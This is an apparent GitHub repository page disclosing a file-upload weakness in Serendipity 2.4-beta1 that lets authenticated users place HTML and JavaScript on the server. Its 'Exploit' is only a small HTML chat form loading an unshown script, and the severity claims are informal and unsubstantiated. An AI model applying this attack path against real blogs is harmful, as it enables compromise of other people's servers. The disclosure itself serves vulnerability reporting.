Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/s9y/2023/Serendipity-2.4-beta-1/
CVE-nu11secur1ty/vendors/s9y/2023/Serendipity-2.4-beta-1/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

Serendipity 2.4-beta1

Vendor

Description:

The already authenticated attacker can upload HTML and JavaScript files on the server, which is absolutely dangerous and STUPID In these files, the attacker can be codding a malicious web socket.
In this scenario, the attacker includes his own app directly on this server and then he starts this application for his own purposes. It depends on the scenario, the attacker can steal every day very sensitive information, for a very long period of time, until the other users will know that something is not ok with this system, and they decide to stop using her, but maybe they will be too late for this decision. Or even more worst than ever, he can harm seriously this server!

STATUS: CRITICAL Vulnerability

[+]Exploit:

<!DOCTYPE html>
<html>

<body>
    <div id="chat"></div>
    <input id="name" type="text" placeholder="name" />
    <input id="message" type="text" placeholder="message" />
    <button id="send">Send</button>

    <script src="PoCl.js"></script>
</body>

</html>

Reproduce:

href

Proof and Exploit:

href

Time spend:

01:00:00